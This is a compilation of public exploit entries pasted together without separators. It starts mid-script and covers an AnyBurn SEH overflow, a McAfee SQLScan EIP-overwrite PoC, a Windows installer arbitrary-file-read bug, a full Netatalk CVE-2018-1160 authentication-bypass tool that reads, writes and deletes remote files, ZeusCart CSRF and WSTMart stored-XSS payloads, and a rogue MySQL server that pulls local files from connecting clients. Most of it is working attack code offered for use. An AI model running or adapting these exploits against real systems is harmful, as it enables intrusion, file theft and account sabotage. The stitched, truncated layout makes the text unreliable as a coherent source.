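seh = "\xb5\x4d" # 0x004d00b5 POP POP RET in AnyBurn.exe module
preamble = "\x58" * 47 + shellcode + "\x58" * (9197 - 47 - len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops) - len(align))

# Written as raw bytes: the 0x94/0xb5 bytes must reach the file as single ANSI
# bytes for the Unicode conversion to yield 0x201D / 0x004d00b5. A text-mode
# write on Python 3 would UTF-8 encode them and break the exploit.
try:
    print("[+] Creating %s bytes lasagna payload.." % len(exploit))
    with open("exploit.txt", "wb") as f:
        f.write(exploit if isinstance(exploit, bytes) else exploit.encode("latin-1"))
    print("[+] File created!")
except (IOError, OSError) as err:
    # the original swallowed every exception with a bare except; report the reason
    print("File cannot be created: %s" % err)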
# Exploit Title: McAfee Foundstone SQLScan - Denial of Service (PoC) and EIP register overwrite
# Discovery by: Rafael Pedrero
# Discovery Date: 2018-12-20
# Vendor Homepage: http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
# Software Link : http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
# Tested Version: 1.0.0.0
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run SQLScan
# 2.- copy content SQLScan_Crash.txt to clipboard (result from this python script)
# 3.- Paste the content into the field: 'Hostname/IP'
# 4.- Click '->' button and you will see a crash.
'''
EAX 00000001
ECX 0012F8CC
EDX 7C91E4F4 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0012FA80
EBP 42424242
ESI 00402FEB SQLScan.00402FEB
EDI 0012FAD0
EIP 43434343
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 1 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
'''
#!/usr/bin/env python
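# 384 bytes of filler reach the saved frame pointer; the next two dwords land in
# EBP ("BBBB" = 0x42424242) and EIP ("CCCC" = 0x43434343), matching the register
# dump above, so EIP is under the attacker's control.
junk = "\x41" * 384
crash = junk + "BBBB" + "CCCC"
# context manager so the handle is closed even if the write fails
with open("SQLScan_Crash.txt", "w") as f:
    f.write(crash)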
The bug is in “MsiAdvertiseProduct”
Calling this function will result in a file copy by the installer service.
This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU (time-of-check/time-of-use race) .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results in an arbitrary file read vulnerability.
To reproduce:
Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory.
Usage: readfile.exe targetfile (where targetfile is the file to read, i.e.: "readfile.exe c:\users\test\desktop\desktop.ini")
Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy).. you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o
The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
Even without an enumeration vector, this is still bad news, because a lot of document software, like Office, will actually keep files in static locations that contain the full paths and filenames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46028.zip
##
# Exploit Title: Netatalk Authentication Bypass
# Date: 12/20/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: http://netatalk.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netatalk/files/
# Version: Before 3.1.12
# Tested on: Seagate NAS OS (x86_64)
# CVE : CVE-2018-1160
# Advisory: https://www.tenable.com/security/research/tra-2018-48
##
import argparse
import socket
import struct
import sys
# Known addresses:
# This exploit was written against a Netatalk compiled for an
# x86_64 Seagate NAS. The addresses below will need to be changed
# for a different target.
# 8-byte little-endian pointers kept as str so they concatenate with the
# (Python 2) str request buffers below.
# NOTE(review): this byte string decodes to 0x63b660, not the 0x63b6a0 the
# trailing comment claims -- one of the two is wrong; confirm against the binary.
preauth_switch_base = '\x60\xb6\x63\x00\x00\x00\x00\x00' # 0x63b6a0
afp_getsrvrparms = '\x60\xb6\x42\x00\x00\x00\x00\x00' # 0x42b660
afp_openvol = '\xb0\xb8\x42\x00\x00\x00\x00\x00' # 42b8b0
afp_enumerate_ext2 = '\x90\x97\x41\x00\x00\x00\x00\x00' # 419790
afp_openfork = '\xd0\x29\x42\x00\x00\x00\x00\x00' # 4229d0
afp_read_ext = '\x30\x3a\x42\x00\x00\x00\x00\x00' # 423a30
afp_createfile = '\x10\xcf\x41\x00\x00\x00\x00\x00' # 41cf10
afp_write_ext = '\xb0\x3f\x42\x00\x00\x00\x00\x00' # 423fb0
afp_delete = '\x20\x06\x42\x00\x00\x00\x00\x00' # 420620
##
# This is the actual exploit. Overwrites the commands pointer
# with the base of the preauth_switch
##
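def do_exploit(sock):
    """Corrupt the DSI session so later command data lands on preauth_switch.

    An oversized option in the DSIOpenSession request overruns the dsi struct:
    the fields listed below are clobbered in order and the final 8 bytes
    replace the commands pointer with preauth_switch_base, so the payload of
    the next DSICommand is copied over the pre-auth function table.

    Args:
        sock: connected socket to the AFP/DSI service.

    The single reply is read and discarded; nothing is checked here.
    """
    print("[+] Sending exploit to overwrite preauth_switch data.")
    data = '\x00\x04\x00\x01\x00\x00\x00\x00'   # flags 0, command 4 (open session), request id 1, data offset 0
    data += '\x00\x00\x00\x1a\x00\x00\x00\x00'  # length 0x1a = 1+1+4*4+8 option bytes, reserved
    data += '\x01' # attnquant in open sess
    data += '\x18' # attnquant size
    data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
    data += '\xef\xbe\xad\xde' # overwrites datasize
    data += '\xfe\xca\x1d\xc0' # overwrites server_quantum
    data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
    data += preauth_switch_base # overwrite the commands ptr
    sock.sendall(data)
    # don't really care about the response
    resp = sock.recv(1024)
    return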
##
# Sends a request to the server.
#
# @param socket the socket we are writing on
# @param request_id two bytes. requests are tracked through the session
# @param address the address that we want to jump to
# @param param_string the params that the address will need
##
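def send_request(socket, request_id, address, param_string):
    """Send one DSICommand whose 0x90-byte body is copied over preauth_switch.

    After do_exploit() the server copies incoming command data onto the
    pre-auth function table, so the body is laid out as that table: byte 0 is
    the AFP function code the server will dispatch on (0x11 = 17), 134 bytes
    of parameters follow, and the trailing 8 bytes sit at offset 136 = 17 * 8,
    i.e. exactly in table slot 17 -- the address is therefore the function
    that gets called, with *param_string* as its parameter block.

    Args:
        socket: connected socket (the name shadows the stdlib module inside
            this function and is kept for compatibility; the original body
            referenced a module-level `sock` instead of its own parameter).
        request_id: 2 bytes, big-endian; the reply echoes it.
        address: 8-byte little-endian pointer to jump to.
        param_string: parameter block, at most 134 bytes; "" or False means
            all zeros.

    Raises:
        ValueError: if param_string would overflow into the address slot.
    """
    if not param_string:
        params = "\x00" * 134
    else:
        if len(param_string) > 134:
            raise ValueError("param_string is %d bytes; at most 134 fit before the address slot"
                             % len(param_string))
        params = param_string + "\x00" * (134 - len(param_string))
    data = '\x00'              # flags: request
    data += '\x02'             # command 2 (DSICommand)
    data += request_id
    data += '\x00\x00\x00\x00' # data offset
    data += '\x00\x00\x00\x90' # cmd length: always 0x90 = 1 + 1 + 134 + 8
    data += '\x00\x00\x00\x00' # reserved
    # ==== below gets copied into dsi->cmd (and thus over preauth_switch) =====
    data += '\x11'             # function code 17: selects the table slot written below
    data += '\x00'             # pad
    data += params
    data += address            # lands in slot 17 (offset 136) of the hijacked table
    socket.sendall(data)
    return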
##
# Parses the DSI header. If we don't get the expected request id
# then we bail out.
##
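def parse_dsi(payload, expected_req_id):
    """Validate a DSI reply header and return the AFP data that follows it.

    Args:
        payload: raw bytes from the socket: 16-byte DSI header + AFP data.
        expected_req_id: the request id we sent; a DSICommand (2) reply must
            carry flags == 1 and echo it.

    Returns:
        The AFP payload after the header. If the server interleaves a
        DSIAttention (command 8) that is followed by more data in the same
        buffer, the attention is skipped and the next header is parsed
        instead; an attention with nothing after it is returned as-is.

    Exits the process with status 1 (the original exited with 0, hiding the
    failure from callers) on a mismatched header, an error code other than
    0 / 0xFFFFEC6F, or a length that does not match the buffer.
    """
    (flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
    if command != 8:
        if flags != 1 or command != 2 or req_id != expected_req_id:
            print('[-] Bad DSI Header: %u %u %u' % (flags, command, req_id))
            sys.exit(1)
    # 4294962287 == 0xFFFFEC6F == -5009 as a signed 32-bit value; presumably
    # the AFP end-of-file error, which is benign for a short read.
    if error_code != 0 and error_code != 4294962287:
        print('[-] The server responded with an error code: ' + str(error_code))
        sys.exit(1)
    afp_data = payload[16:]
    if len(afp_data) != length:
        if command != 8:
            print('[-] Invalid length in DSI header: ' + str(length) + ' vs. ' + str(len(afp_data)))
            sys.exit(1)
        # attention message with trailing data: drop it and parse what follows
        afp_data = parse_dsi(afp_data[length:], expected_req_id)
    return afp_data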
##
# List all the volumes on the remote server
##
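def list_volumes(sock):
    """Print the volumes the server exports (FPGetSrvrParms via the hijacked table).

    Only one 1024-byte recv() is consumed; a very long volume list would be cut.
    """
    print("[+] Listing volumes")
    send_request(sock, "\x00\x01", afp_getsrvrparms, "")
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 1)
    (server_time, volumes) = struct.unpack_from('>IB', afp_data)
    print("[+] " + str(volumes) + " volumes are available:")
    afp_data = afp_data[5:]
    for _ in range(volumes):
        # Each entry is a flags byte followed by a Pascal string (length byte
        # + name). The original unpacked both bytes as one big-endian short,
        # which only yields the right length while the flags byte is zero.
        (flags, name_length) = struct.unpack_from('>BB', afp_data)
        name = afp_data[2 : 2 + name_length]
        print("\t-> " + name)
        afp_data = afp_data[2 + name_length:]
    return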
##
# Open a volume on the remote server
##
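def open_volume(sock, request, params):
    """Issue FPOpenVol and return the volume id from the reply.

    Args:
        sock: connected socket.
        request: 2-byte big-endian request id. The reply is validated against
            it (the original hard-coded 1, so any other id was rejected).
        params: FPOpenVol parameter block (bitmap + Pascal volume name).

    Returns:
        The 16-bit volume id (vid).
    """
    send_request(sock, request, afp_openvol, params)
    resp = sock.recv(1024)
    expected_id = struct.unpack('>H', request)[0]
    afp_data = parse_dsi(resp, expected_id)
    (bitmap, vid) = struct.unpack_from('>HH', afp_data)
    return vid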
##
# List the contents of a specific volume
##
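def list_volume_content(sock, name):
    """Open volume *name* and print one line per entry of its root directory.

    Only one 1024-byte recv() is consumed, so a large directory is cut short.
    """
    print("[+] Listing files in volume " + name)
    # open the volume ('B' rather than 'b': a name over 127 bytes made 'b' raise)
    length = struct.pack("B", len(name))
    vid = open_volume(sock, "\x00\x01", "\x00\x20" + length + name)
    print("[+] Volume ID is " + str(vid))
    # enumerate (FPEnumerateExt2): vid, then what appears to be dir id 2 (root),
    # file/dir bitmaps, request count, start index, max reply size and a
    # path-type-2 empty path -- fixed values as published.
    packed_vid = struct.pack(">H", vid)   # unsigned, matching the '>HH' the vid came from
    send_request(sock, "\x00\x02", afp_enumerate_ext2, packed_vid + "\x00\x00\x00\x02\x01\x40\x01\x40\x07\xff\x00\x00\x00\x01\x7f\xff\xff\xff\x02\x00\x00\x00")
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 2)
    (f_bitmap, d_bitmap, req_count) = struct.unpack_from('>HHH', afp_data)
    afp_data = afp_data[6:]
    print("[+] Files (%u):" % req_count)
    for _ in range(req_count):
        # entry: total length, is-dir flag, pad, 2 unknown bytes, file id, name length, name
        (length, is_dir, pad, something, file_id, name_length) = struct.unpack_from('>HBBHIB', afp_data)
        name = afp_data[11:11 + name_length]
        if is_dir:
            print("\t[%u] %s/" % (file_id, name))
        else:
            print("\t[%u] %s" % (file_id, name))
        afp_data = afp_data[length:]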
##
# Read the contents of a specific file.
##
def cat_file(sock, vol_name, file_name):
    """Open a fork of file_name on volume vol_name, read it and print the raw reply body.

    Args:
        sock: connected socket to the server.
        vol_name: volume name (signed 1-byte length prefix).
        file_name: file name (signed 1-byte length prefix), resolved relative to the
            "\x00\x00\x00\x02" prefix used by every file command in this file.

    Sequence: open_volume (request id 1), afp_openfork (request id 2) whose reply is
    decoded as ">HH" (f_bitmap, fork_id), then afp_read_ext (request id 3) with a
    constant parameter block; the body of that single reply is printed as-is.
    Returns None.
    """
    print "[+] Cat file %s in volume %s" % (file_name, vol_name)
    # open the volume
    vol_length = struct.pack("b", len(vol_name))
    vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
    print "[+] Volume ID is " + str(vid)
    # open fork
    packed_vid = struct.pack(">h", vid)
    file_length = struct.pack("b", len(file_name))
    send_request(sock, "\x00\x02", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 2)
    (f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
    print "[+] Fork ID: %s" % (fork_id)
    # read file: fork id followed by fixed offset/count fields (constant bytes)
    packed_fork = struct.pack(">h", fork_id)
    send_request(sock, "\x00\x03", afp_read_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x03\x00")
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 3)
    print "[+] File contents:"
    print afp_data
##
# Create a file on the remote volume
##
def write_file(sock, vol_name, file_name, data):
    """Create file_name on volume vol_name and write `data` into a fork of it.

    Args:
        sock: connected socket to the server.
        vol_name: volume name (unsigned 1-byte length prefix; note cat_file and
            delete_file's siblings use "b"/">h" where this function uses "B"/">H").
        file_name: name of the file to create.
        data: bytes to write. The payload sent below is padded with "\x0a" to
            exactly 144 bytes, which is why main() refuses longer data.

    Sequence: afp_createfile (request id 2; a non-empty reply body triggers one
    extra recv whose result is discarded), afp_openfork (request id 3, reply
    ">HH" -> f_bitmap, fork_id), afp_write_ext (request id 4) carrying an 8-byte
    big-endian length of `data`, then the padded 144-byte payload, then one reply
    read. Prints progress and returns None.
    """
    print "[+] Writing to %s in volume %s" % (file_name, vol_name)
    # open the volume
    vol_length = struct.pack("B", len(vol_name))
    vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
    print "[+] Volume ID is " + str(vid)
    # create the file
    packed_vid = struct.pack(">H", vid)
    file_length = struct.pack("B", len(file_name))
    send_request(sock, "\x00\x02", afp_createfile, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 2)
    if len(afp_data) != 0:
        # drain one more reply; its content is not inspected
        sock.recv(1024)
    # open fork
    packed_vid = struct.pack(">H", vid)
    file_length = struct.pack("B", len(file_name))
    send_request(sock, "\x00\x03", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 3)
    (f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
    print "[+] Fork ID: %s" % (fork_id)
    # write: the length field announces len(data), while 144 bytes are then sent
    packed_fork = struct.pack(">H", fork_id)
    data_length = struct.pack(">Q", len(data))
    send_request(sock, "\x00\x04", afp_write_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + data_length + data)
    #resp = sock.recv(1024)
    sock.send(data + ("\x0a"*(144 - len(data))))
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 4)
    print "[+] Fin"
##
# Delete a file on the remote volume
##
def delete_file(sock, vol_name, file_name):
    """Delete file_name from volume vol_name via afp_delete.

    Args:
        sock: connected socket to the server.
        vol_name: volume name (unsigned 1-byte length prefix).
        file_name: name of the file to delete, with the same "\x00\x00\x00\x02\x02"
            prefix as afp_createfile in write_file.

    Sequence: open_volume (request id 1), afp_delete (request id 2); the reply is
    unframed but otherwise not inspected. Returns None.
    """
    print "[+] Deleting %s from volume %s" % (file_name, vol_name)
    # open the volume
    vol_length = struct.pack("B", len(vol_name))
    vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
    print "[+] Volume ID is " + str(vid)
    # delete the file
    packed_vid = struct.pack(">H", vid)
    file_length = struct.pack("B", len(file_name))
    send_request(sock, "\x00\x02", afp_delete, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
    resp = sock.recv(1024)
    afp_data = parse_dsi(resp, 2)
    print "[+] Fin"
##
##
## Main
##
##
# Script entry point: parse arguments, connect once, run do_exploit, then exactly
# one of the post-exploitation actions below on the same connection.
top_parser = argparse.ArgumentParser(description='I\'m a little pea. I love the sky and the trees.')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
# argparse passes a string default through type=int, so args.port is an int
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="548")
top_parser.add_argument('-lv', '--list-volumes', action="store_true", dest="lv", help="List the volumes on the remote target.")
top_parser.add_argument('-lvc', '--list-volume-content', action="store_true", dest="lvc", help="List the content of a volume.")
top_parser.add_argument('-c', '--cat', action="store_true", dest="cat", help="Dump contents of a file.")
top_parser.add_argument('-w', '--write', action="store_true", dest="write", help="Write to a new file.")
top_parser.add_argument('-f', '--file', action="store", dest="file", help="The file to operate on")
top_parser.add_argument('-v', '--volume', action="store", dest="volume", help="The volume to operate on")
top_parser.add_argument('-d', '--data', action="store", dest="data", help="The data to write to the file")
top_parser.add_argument('-df', '--delete-file', action="store_true", dest="delete_file", help="Delete a file")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
# do_exploit (defined elsewhere in this file) always runs before any action; every
# helper below assumes it succeeded. Defensive note: keeping the AFP service
# patched and its port off untrusted networks removes this foothold entirely.
do_exploit(sock)
# First matching action wins; each needs its own arguments (checked with `!= None`).
if args.lv:
    list_volumes(sock)
elif args.lvc and args.volume != None:
    list_volume_content(sock, args.volume)
elif args.cat and args.file != None and args.volume != None:
    cat_file(sock, args.volume, args.file)
elif args.write and args.volume != None and args.file != None and args.data != None:
    # write_file pads its payload to exactly 144 bytes, hence the limit here
    if len(args.data) > 144:
        print "This implementation has a max file writing size of 144"
        sys.exit(0)
    write_file(sock, args.volume, args.file, args.data)
elif args.delete_file and args.volume != None and args.file != None:
    delete_file(sock, args.volume, args.file)
else:
    print("Bad args")
sock.close()
# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF
1. Vulnerability Description
Because the form submission is not validated, ZeusCart 4.0 is vulnerable to
Cross-Site Request Forgery (CSRF): an attacker can perform actions on behalf
of a victim by having the victim visit an attacker-controlled site.
In this case the attacker can "deactivate" any customer account, which bans
the account so that it can no longer log in.
Proof of Concept:
<!-- CSRF proof of concept: a hidden image element is used to make the victim's
     browser issue a state-changing GET to the admin endpoint, carrying the
     victim's own session cookie. Mitigation on the application side: require a
     per-session anti-CSRF token on the admin action and perform state changes
     via POST; SameSite session cookies reduce exposure further. -->
<html>
<body>
<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
</body>
</html>
# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage: https://github.com/wstmall/wstmart/
# Software Link: http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE: CVE-2018-20367
# 0x01 stored XSS (PoC)
Function point: mall product detail page - product consultation form
poc:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454
goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E
#!/usr/bin/env python
#coding: utf8
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers
# Listen on the standard MySQL port so unmodified clients connect to this server.
PORT = 3306
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# Every pushed and received packet is appended to mysql.log next to the script
# (WatchedFileHandler reopens the file if it is rotated).
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
    tmp_format
)
# Paths the server requests from the connecting client (see http_request_handler,
# which picks one at random per query). Only the Windows win.ini entry is active;
# the commented entries are the author's alternatives.
filelist = (
    # r'c:\boot.ini',
    r'c:\windows\win.ini',
    # r'c:\windows\system32\drivers\etc\hosts',
    # '/etc/passwd',
    # '/etc/shadow',
)
#================================================
#=======No need to change after this lines=======
#================================================
__author__ = 'Gifts'
def daemonize():
    """Detach the current process as a double-fork POSIX daemon.

    On a non-POSIX system a warning is emitted and the function returns without
    forking. Otherwise: fork and exit the parent, start a new session, fork again
    and exit the intermediate process, set umask 022, and redirect file
    descriptors 0-2 to /dev/null. dup2 on an already-closed descriptor raises
    EBADF (errno 9), which is ignored; any other OSError propagates.
    Note: `xrange` makes this Python 2 code.
    """
    import os, warnings
    if os.name != 'posix':
        warnings.warn('Cant create daemon on non-posix system')
        return
    # first fork: parent exits so the shell sees the command finish
    if os.fork(): os._exit(0)
    os.setsid()
    # second fork: the session leader exits so the daemon can never reacquire a tty
    if os.fork(): os._exit(0)
    os.umask(0o022)
    null=os.open('/dev/null', os.O_RDWR)
    for i in xrange(3):
        try:
            os.dup2(null, i)
        except OSError as e:
            # errno 9 (EBADF): descriptor i was not open, nothing to redirect
            if e.errno != 9: raise
    os.close(null)
class LastPacket(Exception):
    """Raised inside the packet handler to signal that the exchange is complete."""
class OutOfOrder(Exception):
    """Raised when a received packet's sequence number is not the one expected."""
class mysql_packet(object):
    """One framed MySQL packet: a sequence number plus a raw payload string.

    str() renders the frame: packet_header packs a 16-bit little-endian length, a
    zero byte (the high length byte) and the sequence number, followed by the
    payload. packet_type may be an int, used as the sequence number directly, or
    another mysql_packet, in which case this packet takes the next number.
    """
    packet_header = struct.Struct('<Hbb')
    packet_header_long = struct.Struct('<Hbbb')

    def __init__(self, packet_type, payload):
        # Continue the sequence when a previous packet is handed in.
        if isinstance(packet_type, mysql_packet):
            seq = packet_type.packet_num + 1
        else:
            seq = packet_type
        self.packet_num = seq
        self.payload = payload

    def __str__(self):
        size = len(self.payload)
        if size < 65536:
            header = mysql_packet.packet_header.pack(size, 0, self.packet_num)
        else:
            # NOTE(review): kept exactly as in the original - four values are packed
            # into the three-field packet_header (packet_header_long is never used),
            # so this branch raises struct.error for payloads of 64 KiB or more.
            header = mysql_packet.packet_header.pack(size & 0xFFFF, size >> 16, 0, self.packet_num)
        return "{0}{1}".format(header, self.payload)

    def __repr__(self):
        return repr(str(self))

    @staticmethod
    def parse(raw_data):
        """Split a frame body (sequence byte + payload) into a mysql_packet."""
        return mysql_packet(ord(raw_data[0]), raw_data[1:])
class http_request_handler(asynchat.async_chat):
    """Per-connection handler speaking just enough MySQL wire protocol to make a
    connecting client upload a local file.

    Flow as implemented below: the constructor immediately pushes a server greeting
    (protocol byte 0x0a, version string '3.0.0-Evil_Mysql_Server'); the client's
    login packet is answered with an OK packet; the first query (command byte 0x03)
    is answered with a '\xFB' + filename packet, which in the MySQL protocol asks
    the client to send that local file (LOCAL INFILE request); whatever the client
    sends back is written to the log as 'Result: ...'. No credentials are checked.

    Defensive notes: this only works against clients that allow LOCAL INFILE and
    connect to an untrusted host. Disabling local infile on the client (the MySQL
    client's local-infile option / MYSQL_OPT_LOCAL_INFILE) stops it; the greeting's
    version string and an unsolicited LOCAL INFILE request in reply to the first
    query are usable detection signatures.

    Frame reading is a small state machine: 'LEN' reads the 3-byte header length,
    'Data' reads the sequence byte plus payload, 'MoreLength' handles the oversized
    case. `self.order` is the sequence number expected from the client next.
    """
    def __init__(self, addr):
        # addr is the (socket, peer address) pair returned by accept()
        asynchat.async_chat.__init__(self, sock=addr[0])
        self.addr = addr[1]
        self.ibuffer = []
        self.set_terminator(3)
        self.state = 'LEN'
        self.sub_state = 'Auth'
        self.logined = False  # never read in this class
        # Greeting packet (sequence 0): fields as annotated by the author.
        self.push(
            mysql_packet(
                0,
                "".join((
                    '\x0a',  # Protocol
                    '3.0.0-Evil_Mysql_Server' + '\0',  # Version
                    #'5.1.66-0+squeeze1' + '\0',
                    '\x36\x00\x00\x00',  # Thread ID
                    'evilsalt' + '\0',  # Salt
                    '\xdf\xf7',  # Capabilities
                    '\x08',  # Collation
                    '\x02\x00',  # Server Status
                    '\0' * 13,  # Unknown
                    'evil2222' + '\0',
                ))
            )
        )
        self.order = 1
        self.states = ['LOGIN', 'CAPS', 'ANY']  # never read in this class

    def push(self, data):
        """Log and queue `data` for sending; anything non-str (e.g. None) is sent as str(data)."""
        log.debug('Pushed: %r', data)
        data = str(data)
        asynchat.async_chat.push(self, data)

    def collect_incoming_data(self, data):
        """Buffer received bytes until the current terminator is reached."""
        log.debug('Data recved: %r', data)
        self.ibuffer.append(data)

    def found_terminator(self):
        """Advance the state machine with the bytes collected so far."""
        data = "".join(self.ibuffer)
        self.ibuffer = []
        if self.state == 'LEN':
            # 3-byte little-endian payload length, plus one for the sequence byte
            len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
            if len_bytes < 65536:
                self.set_terminator(len_bytes)
                self.state = 'Data'
            else:
                self.state = 'MoreLength'
        elif self.state == 'MoreLength':
            # a non-zero extra byte is treated as an unsupported frame: drop the client
            if data[0] != '\0':
                self.push(None)
                self.close_when_done()
            else:
                self.state = 'Data'
        elif self.state == 'Data':
            packet = mysql_packet.parse(data)
            try:
                if self.order != packet.packet_num:
                    raise OutOfOrder()
                else:
                    # Fix ?
                    # (author's note) the client's next packet is expected two
                    # numbers on, since the server's reply takes the one between
                    self.order = packet.packet_num + 2
                if packet.packet_num == 0:
                    # sequence 0 is a new command from the client
                    if packet.payload[0] == '\x03':
                        # COM_QUERY: answer with a request for a local file
                        log.info('Query')
                        filename = random.choice(filelist)
                        PACKET = mysql_packet(
                            packet,
                            '\xFB{0}'.format(filename)
                        )
                        self.set_terminator(3)
                        self.state = 'LEN'
                        self.sub_state = 'File'
                        self.push(PACKET)
                    elif packet.payload[0] == '\x1b':
                        log.info('SelectDB')
                        self.push(mysql_packet(
                            packet,
                            '\xfe\x00\x00\x02\x00'
                        ))
                        raise LastPacket()
                    elif packet.payload[0] in '\x02':
                        # generic OK packet
                        self.push(mysql_packet(
                            packet, '\0\0\0\x02\0\0\0'
                        ))
                        raise LastPacket()
                    elif packet.payload == '\x00\x01':
                        # client quit: push "None" and close
                        self.push(None)
                        self.close_when_done()
                    else:
                        raise ValueError()
                else:
                    if self.sub_state == 'File':
                        # the client is streaming the requested file; log each chunk
                        log.info('-- result')
                        log.info('Result: %r', data)
                        if len(data) == 1:
                            # a lone sequence byte (empty payload) ends the transfer
                            self.push(
                                mysql_packet(packet, '\0\0\0\x02\0\0\0')
                            )
                            raise LastPacket()
                        else:
                            self.set_terminator(3)
                            self.state = 'LEN'
                            self.order = packet.packet_num + 1
                    elif self.sub_state == 'Auth':
                        # login packet: accept unconditionally with an OK packet
                        self.push(mysql_packet(
                            packet, '\0\0\0\x02\0\0\0'
                        ))
                        raise LastPacket()
                    else:
                        log.info('-- else')
                        raise ValueError('Unknown packet')
            except LastPacket:
                # reset to wait for the next command (sequence 0)
                log.info('Last packet')
                self.state = 'LEN'
                self.sub_state = None
                self.order = 0
                self.set_terminator(3)
            except OutOfOrder:
                log.warning('Out of order')
                self.push(None)
                self.close_when_done()
        else:
            log.error('Unknown state')
            self.push('None')
            self.close_when_done()
class mysql_listener(asyncore.dispatcher):
    """Accept TCP connections on PORT and hand each one to http_request_handler.

    When no socket is supplied, a reusable IPv4 stream socket is created and bound
    to every local interface on PORT; a failed bind exits the process.
    """
    def __init__(self, sock=None):
        asyncore.dispatcher.__init__(self, sock)
        if sock:
            return
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        try:
            self.bind(('', PORT))
        except socket.error:
            exit()
        self.listen(5)

    def handle_accept(self):
        accepted = self.accept()
        if accepted is None:
            return
        log.info('Conn from: %r', accepted[1])
        http_request_handler(accepted)
